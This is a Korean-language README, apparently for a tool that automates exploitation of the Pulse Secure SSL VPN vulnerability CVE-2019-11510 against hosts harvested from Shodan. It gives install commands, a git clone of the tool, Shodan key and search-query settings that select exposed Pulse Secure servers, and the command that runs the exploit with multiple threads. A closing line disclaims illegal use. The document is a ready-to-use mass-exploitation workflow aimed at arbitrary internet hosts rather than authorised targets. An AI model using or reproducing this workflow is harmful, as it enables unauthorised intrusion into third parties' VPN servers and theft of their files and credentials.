
Pulse Secure SSL VPN 익스플로잇(CVE-2019-11510)을 Shodan API에서 조회한 호스트를 사용하여 자동화하는 스크립트입니다. 이 스크립트를 사용하려면 Shodan 계정이 있어야 합니다.
Pulse Secure SSL VPN 취약점(CVE-2019-11510)을 악용하는 자동화 스크립트이며, Shodan API에서 수집한 호스트를 사용합니다. 이 스크립트를 사용하려면 Shodan 계정이 있어야 합니다. Shodan 계정이 없다면 여기를 클릭하세요.

# CentOS & Fedora
yum install git python3 -y
# Ubuntu & Debian
apt install git python3 python3-pip -y
# FreeBSD
pkg install -y python3 git
python3 -m ensurepip
git clone https://github.com/aqhmal/pulsexploit.git
cd pulsexploit
pip3 install -r requirements.txt
# Shodan API Key (change according to your Shodan API key)
api_key = ''
# Shodan search query (edit this, but don't remove the html and port)
search_query = 'html:"/dana/" port:"443"'
python3 pulsexploit.py -t <number of threads/ default: 5>
이 스크립트는 침투 테스트 및 보안 연구 목적으로만 사용해야 하며, 불법적인 활동에 사용할 경우 책임지지 않습니다.